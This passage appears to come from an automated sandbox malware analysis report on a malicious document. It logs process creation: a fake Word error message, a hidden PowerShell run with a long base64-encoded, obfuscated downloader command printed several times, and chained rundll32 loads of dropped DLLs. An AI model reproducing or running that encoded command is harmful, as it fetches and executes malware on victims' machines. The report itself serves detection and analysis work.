behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file. Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEYAMgBPAE0AWQBqACAAIAA9ACAAWwB0AFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIAIAAtAEYAIAAnAFkAUwB0AGUAJwAsACcARABJAHIAZQBjAFQAbwByAFkAJwAsACcAcwAnACwAJwBNAC4ASQBPAC4AJwApADsAIAAgACAAJAAwAFMASAAxAGcAMwAgACAAPQAgAFsAVABZAHAARQBdACgAIgB7ADMAfQB7ADAAfQB7ADIAfQB7ADEAfQB7ADQAfQAiAC0ARgAnAEUAVAAuACcALAAnAGMARQBwAE8ASQBuAFQAbQAnACwAJwBzAGUAcgBWAGkAJwAsACcAcwB5AHMAdABlAE0ALgBuACcALAAnAEEATgBhAEcAZQBSACcAKQAgACAAOwAgACAAJABXAHUAbAB3AHkAdwBkAD0AKAAoACcAVQAnACsAJwBmAGEAJwApACsAKAAnAG8AcAAnACsAJwB2ACcAKQArACcAbQAnACkAOwAkAEMANgA3AHkAdgBwAF8APQAkAEcAZwBsAGgAMgBsAGkAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEUAMgBjAGkAeABoAGwAOwAkAFMAOAA1AGEAZABvAGQAPQAoACgAJwBJACcAKwAnAGYAbQAnACkAKwAnADAAJwArACgAJwBuACcAKwAnAHEANAAnACkAKQA7ACAAKABsAHMAIAAoACcAdgBBAHIAaQBhACcAKwAnAGIATABlADoAZgAnACsAJwAyAG8AJwArACcATQB5AEoAJwApACAAKQAuAFYAQQBsAHUAZQA6ADoAIgBjAFIAYABFAGAAQQBgAFQAZQBkAEkAcgBlAGMAVABvAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcANABxADcAQgBxACcAKwAnAHAAZQAnACkAKwAoACcAZQBuACcAKwAnADYAJwApACsAKAAnADQAcQA3AEIAJwArACcAYgAnACsAJwBzACcAKQArACgAJwA1AHcAXwAnACsAJwBlACcAKQArACgAJwA0AHEAJwArACcANwAnACkAKQAtAFIARQBwAEwAYQBDAEUAKAAnADQAcQAnACsAJwA3ACcAKQAsAFsAYwBoAGEAUgBdADkAMgApACkAOwAkAFMAbAB1AHEAegA4AGkAPQAoACgAJwBJACcAKwAnAGsAcQA4AHUAJwApACsAJwA3AHgAJwApADsAIAAgACgARwBlAHQALQB2AEEAcgBJAEEAQgBsAEUAIAAoACIAMAAiACsAIgBTAEgAMQAiACsAIgBnADMAIgApACAALQBWAEEATAB1AGUAbwBuAGwAIAAgACkAOgA6ACIAcwBFAGAAYwBgAFUAcgBpAFQAeQBwAHIAbwBUAE8AYwBgAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKQA7ACQAVwA3AHkAcwAzAGwAZAA9ACgAKAAnAEIANwAnACsAJwA3AHYAJwApACsAKAAnADAAawAnACsAJwB5ACcAKQApADsAJABLAGEAMABlAGsAZgBhACAAPQAgACgAKAAnAFkAdgB0AGwAJwArACcAeAAnACkAKwAnADYAcAAnACsAJwA0ACcAKQA7ACQASAB6ADUAOQBnADcAcgA9ACgAKAAnAFUAZQAnACsAJwByACcAKQArACgAJwA0ACcAKwAnAGwAMQAnACkAKwAnAHAAJwApADsAJABTAG4ANABiAHgAdQBiAD0AKAAnAFQAMAAnACsAJwBfACcAKwAoACcAbgBsACcAKwAnADkAXwAnACkAKQA7ACQAUABpADkAbgB5AGYAcQA9ACQASABPAE0ARQArACgAKAAoACcAQgBEACcAKwAnAHkAJwApACsAKAAnAEIAcQAnACsAJwBwAGUAZQBuACcAKQArACcANgAnACsAKAAnAEIARAB5ACcAKwAnAEIAYgAnACkAKwAnAHMANQAnACsAKAAnAHcAJwArACcAXwBlAEIARAB5ACcAKQApAC4AIgByAGUAYABQAEwAYQBDAGUAIgAoACgAJwBCACcAKwAnAEQAeQAnACkALAAnAFwAJwApACkAKwAkAEsAYQAwAGUAawBmAGEAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFcANAByAHcAagA5ADgAPQAoACgAJwBLACcAKwAnAGIAaABnACcAKQArACcAZwAnACsAJwA5AHgAJwApADsAJABOAG0AOQBkAGMAdABuAD0ATgBFAFcALQBgAG8AYgBgAGoAZQBgAGMAVAAgAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAHQAOwAkAEMAawA4ADEAeAB4ADIAPQAoACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgBKACcAKQArACgAKAAnACkAJwArACcAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAoAGIAaQBnACcAKQApACsAKAAnAGwAYQAnACsAJwB1AGcAJwApACsAJwBoACcAKwAoACcAcwAnACsAJwAuAG8AcgBnACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACcAKAAnACsAKAAnAHMAJwArACcAbQBhAGwAbAAnACkAKwAnAHAAJwArACgAJwBvAHQAYQAnACsAJwB0AG8AZQAnACkAKwAoACgAJwBzAEoAKQAnACsAJwAoADMAJwApACkAK Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll #1 Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll #1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ocet\gyzufj.pjr',RunDLL Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mylz\dnoauh.fda',RunDLL Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Skqv\bpgr.lft',RunDLL Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Rmmi\fgaafkb.bqv',RunDLL Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eeay\tsbyty.hpi',RunDLL Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jfjk\etjwcl.eoy',RunDLL Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Cyjj\rnycqfi.rmc',RunDLL Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fpxy\zbyjv.xxd',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xcmo\muvihv.sjs',RunDLL
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAkAEYAMgBPAE0AWQBqACAAIAA9ACAAWwB0AFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIAIAAtAEYAIAAnAFkAUwB0AGUAJwAsACcARABJAHIAZQBjAFQAbwByAFkAJwAsACcAcwAnACwAJwBNAC4ASQBPAC4AJwApADsAIAAgACAAJAAwAFMASAAxAGcAMwAgACAAPQAgAFsAVABZAHAARQBdACgAIgB7ADMAfQB7ADAAfQB7ADIAfQB7ADEAfQB7ADQAfQAiAC0ARgAnAEUAVAAuACcALAAnAGMARQBwAE8ASQBuAFQAbQAnACwAJwBzAGUAcgBWAGkAJwAsACcAcwB5AHMAdABlAE0ALgBuACcALAAnAEEATgBhAEcAZQBSACcAKQAgACAAOwAgACAAJABXAHUAbAB3AHkAdwBkAD0AKAAoACcAVQAnACsAJwBmAGEAJwApACsAKAAnAG8AcAAnACsAJwB2ACcAKQArACcAbQAnACkAOwAkAEMANgA3AHkAdgBwAF8APQAkAEcAZwBsAGgAMgBsAGkAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEUAMgBjAGkAeABoAGwAOwAkAFMAOAA1AGEAZABvAGQAPQAoACgAJwBJACcAKwAnAGYAbQAnACkAKwAnADAAJwArACgAJwBuACcAKwAnAHEANAAnACkAKQA7ACAAKABsAHMAIAAoACcAdgBBAHIAaQBhACcAKwAnAGIATABlADoAZgAnACsAJwAyAG8AJwArACcATQB5AEoAJwApACAAKQAuAFYAQQBsAHUAZQA6ADoAIgBjAFIAYABFAGAAQQBgAFQAZQBkAEkAcgBlAGMAVABvAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcANABxADcAQgBxACcAKwAnAHAAZQAnACkAKwAoACcAZQBuACcAKwAnADYAJwApACsAKAAnADQAcQA3AEIAJwArACcAYgAnACsAJwBzACcAKQArACgAJwA1AHcAXwAnACsAJwBlACcAKQArACgAJwA0AHEAJwArACcANwAnACkAKQAtAFIARQBwAEwAYQBDAEUAKAAnADQAcQAnACsAJwA3ACcAKQAsAFsAYwBoAGEAUgBdADkAMgApACkAOwAkAFMAbAB1AHEAegA4AGkAPQAoACgAJwBJACcAKwAnAGsAcQA4AHUAJwApACsAJwA3AHgAJwApADsAIAAgACgARwBlAHQALQB2AEEAcgBJAEEAQgBsAEUAIAAoACIAMAAiACsAIgBTAEgAMQAiACsAIgBnADMAIgApACAALQBWAEEATAB1AGUAbwBuAGwAIAAgACkAOgA6ACIAcwBFAGAAYwBgAFUAcgBpAFQAeQBwAHIAbwBUAE8AYwBgAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKQA7ACQAVwA3AHkAcwAzAGwAZAA9ACgAKAAnAEIANwAnACsAJwA3AHYAJwApACsAKAAnADAAawAnACsAJwB5ACcAKQApADsAJABLAGEAMABlAGsAZgBhACAAPQAgACgAKAAnAFkAdgB0AGwAJwArACcAeAAnACkAKwAnADYAcAAnACsAJwA0ACcAKQA7ACQASAB6ADUAOQBnADcAcgA9ACgAKAAnAFUAZQAnACsAJwByACcAKQArACgAJwA0ACcAKwAnAGwAMQAnACkAKwAnAHAAJwApADsAJABTAG4ANABiAHgAdQBiAD0AKAAnAFQAMAAnACsAJwBfACcAKwAoACcAbgBsACcAKwAnADkAXwAnACkAKQA7ACQAUABpADkAbgB5AGYAcQA9ACQASABPAE0ARQArACgAKAAoACcAQgBEACcAKwAnAHkAJwApACsAKAAnAEIAcQAnACsAJwBwAGUAZQBuACcAKQArACcANgAnACsAKAAnAEIARAB5ACcAKwAnAEIAYgAnACkAKwAnAHMANQAnACsAKAAnAHcAJwArACcAXwBlAEIARAB5ACcAKQApAC4AIgByAGUAYABQAEwAYQBDAGUAIgAoACgAJwBCACcAKwAnAEQAeQAnACkALAAnAFwAJwApACkAKwAkAEsAYQAwAGUAawBmAGEAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFcANAByAHcAagA5ADgAPQAoACgAJwBLACcAKwAnAGIAaABnACcAKQArACcAZwAnACsAJwA5AHgAJwApADsAJABOAG0AOQBkAGMAdABuAD0ATgBFAFcALQBgAG8AYgBgAGoAZQBgAGMAVAAgAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAHQAOwAkAEMAawA4ADEAeAB4ADIAPQAoACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgBKACcAKQArACgAKAAnACkAJwArACcAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAoAGIAaQBnACcAKQApACsAKAAnAGwAYQAnACsAJwB1AGcAJwApACsAJwBoACcAKwAoACcAcwAnACsAJwAuAG8AcgBnACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACcAKAAnACsAKAAnAHMAJwArACcAbQBhAGwAbAAnACkAKwAnAHAAJwArACgAJwBvAHQAYQAnA
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEYAMgBPAE0AWQBqACAAIAA9ACAAWwB0AFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIAIAAtAEYAIAAnAFkAUwB0AGUAJwAsACcARABJAHIAZQBjAFQAbwByAFkAJwAsACcAcwAnACwAJwBNAC4ASQBPAC4AJwApADsAIAAgACAAJAAwAFMASAAxAGcAMwAgACAAPQAgAFsAVABZAHAARQBdACgAIgB7ADMAfQB7ADAAfQB7ADIAfQB7ADEAfQB7ADQAfQAiAC0ARgAnAEUAVAAuACcALAAnAGMARQBwAE8ASQBuAFQAbQAnACwAJwBzAGUAcgBWAGkAJwAsACcAcwB5AHMAdABlAE0ALgBuACcALAAnAEEATgBhAEcAZQBSACcAKQAgACAAOwAgACAAJABXAHUAbAB3AHkAdwBkAD0AKAAoACcAVQAnACsAJwBmAGEAJwApACsAKAAnAG8AcAAnACsAJwB2ACcAKQArACcAbQAnACkAOwAkAEMANgA3AHkAdgBwAF8APQAkAEcAZwBsAGgAMgBsAGkAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEUAMgBjAGkAeABoAGwAOwAkAFMAOAA1AGEAZABvAGQAPQAoACgAJwBJACcAKwAnAGYAbQAnACkAKwAnADAAJwArACgAJwBuACcAKwAnAHEANAAnACkAKQA7ACAAKABsAHMAIAAoACcAdgBBAHIAaQBhACcAKwAnAGIATABlADoAZgAnACsAJwAyAG8AJwArACcATQB5AEoAJwApACAAKQAuAFYAQQBsAHUAZQA6ADoAIgBjAFIAYABFAGAAQQBgAFQAZQBkAEkAcgBlAGMAVABvAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcANABxADcAQgBxACcAKwAnAHAAZQAnACkAKwAoACcAZQBuACcAKwAnADYAJwApACsAKAAnADQAcQA3AEIAJwArACcAYgAnACsAJwBzACcAKQArACgAJwA1AHcAXwAnACsAJwBlACcAKQArACgAJwA0AHEAJwArACcANwAnACkAKQAtAFIARQBwAEwAYQBDAEUAKAAnADQAcQAnACsAJwA3ACcAKQAsAFsAYwBoAGEAUgBdADkAMgApACkAOwAkAFMAbAB1AHEAegA4AGkAPQAoACgAJwBJACcAKwAnAGsAcQA4AHUAJwApACsAJwA3AHgAJwApADsAIAAgACgARwBlAHQALQB2AEEAcgBJAEEAQgBsAEUAIAAoACIAMAAiACsAIgBTAEgAMQAiACsAIgBnADMAIgApACAALQBWAEEATAB1AGUAbwBuAGwAIAAgACkAOgA6ACIAcwBFAGAAYwBgAFUAcgBpAFQAeQBwAHIAbwBUAE8AYwBgAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKQA7ACQAVwA3AHkAcwAzAGwAZAA9ACgAKAAnAEIANwAnACsAJwA3AHYAJwApACsAKAAnADAAawAnACsAJwB5ACcAKQApADsAJABLAGEAMABlAGsAZgBhACAAPQAgACgAKAAnAFkAdgB0AGwAJwArACcAeAAnACkAKwAnADYAcAAnACsAJwA0ACcAKQA7ACQASAB6ADUAOQBnADcAcgA9ACgAKAAnAFUAZQAnACsAJwByACcAKQArACgAJwA0ACcAKwAnAGwAMQAnACkAKwAnAHAAJwApADsAJABTAG4ANABiAHgAdQBiAD0AKAAnAFQAMAAnACsAJwBfACcAKwAoACcAbgBsACcAKwAnADkAXwAnACkAKQA7ACQAUABpADkAbgB5AGYAcQA9ACQASABPAE0ARQArACgAKAAoACcAQgBEACcAKwAnAHkAJwApACsAKAAnAEIAcQAnACsAJwBwAGUAZQBuACcAKQArACcANgAnACsAKAAnAEIARAB5ACcAKwAnAEIAYgAnACkAKwAnAHMANQAnACsAKAAnAHcAJwArACcAXwBlAEIARAB5ACcAKQApAC4AIgByAGUAYABQAEwAYQBDAGUAIgAoACgAJwBCACcAKwAnAEQAeQAnACkALAAnAFwAJwApACkAKwAkAEsAYQAwAGUAawBmAGEAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFcANAByAHcAagA5ADgAPQAoACgAJwBLACcAKwAnAGIAaABnACcAKQArACcAZwAnACsAJwA5AHgAJwApADsAJABOAG0AOQBkAGMAdABuAD0ATgBFAFcALQBgAG8AYgBgAGoAZQBgAGMAVAAgAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAHQAOwAkAEMAawA4ADEAeAB4ADIAPQAoACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgBKACcAKQArACgAKAAnACkAJwArACcAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAoAGIAaQBnACcAKQApACsAKAAnAGwAYQAnACsAJwB1AGcAJwApACsAJwBoACcAKwAoACcAcwAnACsAJwAuAG8AcgBnACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACcAKAAnACsAKAAnAHMAJwArACcAbQBhAGwAbAAnACkAKwAnAHAAJwArACgAJwBvAHQAYQAnACsAJwB0AG8AZQAnACkAKwAoACgAJwBzAEoAKQAnACsAJwAoADMAJwApACkAK
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEYAMgBPAE0AWQBqACAAIAA9ACAAWwB0AFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIAIAAtAEYAIAAnAFkAUwB0AGUAJwAsACcARABJAHIAZQBjAFQAbwByAFkAJwAsACcAcwAnACwAJwBNAC4ASQBPAC4AJwApADsAIAAgACAAJAAwAFMASAAxAGcAMwAgACAAPQAgAFsAVABZAHAARQBdACgAIgB7ADMAfQB7ADAAfQB7ADIAfQB7ADEAfQB7ADQAfQAiAC0ARgAnAEUAVAAuACcALAAnAGMARQBwAE8ASQBuAFQAbQAnACwAJwBzAGUAcgBWAGkAJwAsACcAcwB5AHMAdABlAE0ALgBuACcALAAnAEEATgBhAEcAZQBSACcAKQAgACAAOwAgACAAJABXAHUAbAB3AHkAdwBkAD0AKAAoACcAVQAnACsAJwBmAGEAJwApACsAKAAnAG8AcAAnACsAJwB2ACcAKQArACcAbQAnACkAOwAkAEMANgA3AHkAdgBwAF8APQAkAEcAZwBsAGgAMgBsAGkAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEUAMgBjAGkAeABoAGwAOwAkAFMAOAA1AGEAZABvAGQAPQAoACgAJwBJACcAKwAnAGYAbQAnACkAKwAnADAAJwArACgAJwBuACcAKwAnAHEANAAnACkAKQA7ACAAKABsAHMAIAAoACcAdgBBAHIAaQBhACcAKwAnAGIATABlADoAZgAnACsAJwAyAG8AJwArACcATQB5AEoAJwApACAAKQAuAFYAQQBsAHUAZQA6ADoAIgBjAFIAYABFAGAAQQBgAFQAZQBkAEkAcgBlAGMAVABvAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcANABxADcAQgBxACcAKwAnAHAAZQAnACkAKwAoACcAZQBuACcAKwAnADYAJwApACsAKAAnADQAcQA3AEIAJwArACcAYgAnACsAJwBzACcAKQArACgAJwA1AHcAXwAnACsAJwBlACcAKQArACgAJwA0AHEAJwArACcANwAnACkAKQAtAFIARQBwAEwAYQBDAEUAKAAnADQAcQAnACsAJwA3ACcAKQAsAFsAYwBoAGEAUgBdADkAMgApACkAOwAkAFMAbAB1AHEAegA4AGkAPQAoACgAJwBJACcAKwAnAGsAcQA4AHUAJwApACsAJwA3AHgAJwApADsAIAAgACgARwBlAHQALQB2AEEAcgBJAEEAQgBsAEUAIAAoACIAMAAiACsAIgBTAEgAMQAiACsAIgBnADMAIgApACAALQBWAEEATAB1AGUAbwBuAGwAIAAgACkAOgA6ACIAcwBFAGAAYwBgAFUAcgBpAFQAeQBwAHIAbwBUAE8AYwBgAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKQA7ACQAVwA3AHkAcwAzAGwAZAA9ACgAKAAnAEIANwAnACsAJwA3AHYAJwApACsAKAAnADAAawAnACsAJwB5ACcAKQApADsAJABLAGEAMABlAGsAZgBhACAAPQAgACgAKAAnAFkAdgB0AGwAJwArACcAeAAnACkAKwAnADYAcAAnACsAJwA0ACcAKQA7ACQASAB6ADUAOQBnADcAcgA9ACgAKAAnAFUAZQAnACsAJwByACcAKQArACgAJwA0ACcAKwAnAGwAMQAnACkAKwAnAHAAJwApADsAJABTAG4ANABiAHgAdQBiAD0AKAAnAFQAMAAnACsAJwBfACcAKwAoACcAbgBsACcAKwAnADkAXwAnACkAKQA7ACQAUABpADkAbgB5AGYAcQA9ACQASABPAE0ARQArACgAKAAoACcAQgBEACcAKwAnAHkAJwApACsAKAAnAEIAcQAnACsAJwBwAGUAZQBuACcAKQArACcANgAnACsAKAAnAEIARAB5ACcAKwAnAEIAYgAnACkAKwAnAHMANQAnACsAKAAnAHcAJwArACcAXwBlAEIARAB5ACcAKQApAC4AIgByAGUAYABQAEwAYQBDAGUAIgAoACgAJwBCACcAKwAnAEQAeQAnACkALAAnAFwAJwApACkAKwAkAEsAYQAwAGUAawBmAGEAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFcANAByAHcAagA5ADgAPQAoACgAJwBLACcAKwAnAGIAaABnACcAKQArACcAZwAnACsAJwA5AHgAJwApADsAJABOAG0AOQBkAGMAdABuAD0ATgBFAFcALQBgAG8AYgBgAGoAZQBgAGMAVAAgAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAHQAOwAkAEMAawA4ADEAeAB4ADIAPQAoACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgBKACcAKQArACgAKAAnACkAJwArACcAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAoAGIAaQBnACcAKQApACsAKAAnAGwAYQAnACsAJwB1AGcAJwApACsAJwBoACcAKwAoACcAcwAnACsAJwAuAG8AcgBnACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACcAKAAnACsAKAAnAHMAJwArACcAbQBhAGwAbAAnACkAKwAnAHAAJwArACgAJwBvAHQAYQAnACsAJwB0AG8AZQAnACkAKwAoACgAJwBzAEoAKQAnACsAJwAoADMAJwApACkAK Jump to behavior

Language, Device and Operating System Detection:

barindex
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA, 7_2_10010000
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA, 7_2_10011C13
Source: C:\Windows\SysWOW64\rundll32.exe Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement, 7_2_1001106A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA, 7_2_10011874
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA, 7_2_10011C7A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s, 7_2_10011CB6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen, 7_2_1001190C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage, 7_2_10011980
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW, 7_2_10013DAF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l, 7_2_10014DB7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,__alloca_probe_16,_malloc,GetLocaleInfoW,WideCharToMultiByte,GetLocaleInfoA, 7_2_10013DE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo, 7_2_100109FC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement, 7_2_10009A59
Source: C:\Windows\SysWOW64\rundll32.exe Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement, 7_2_100112C2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA, 7_2_10014F07
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 7_2_10013F22
Source: C:\Windows\SysWOW64\rundll32.exe Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW, 7_2_1000C727
Source: C:\Windows\SysWOW64\rundll32.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage, 7_2_10011B52
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA,GetLocaleInfoA,GetACP, 7_2_1001175D
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation Jump to behavior
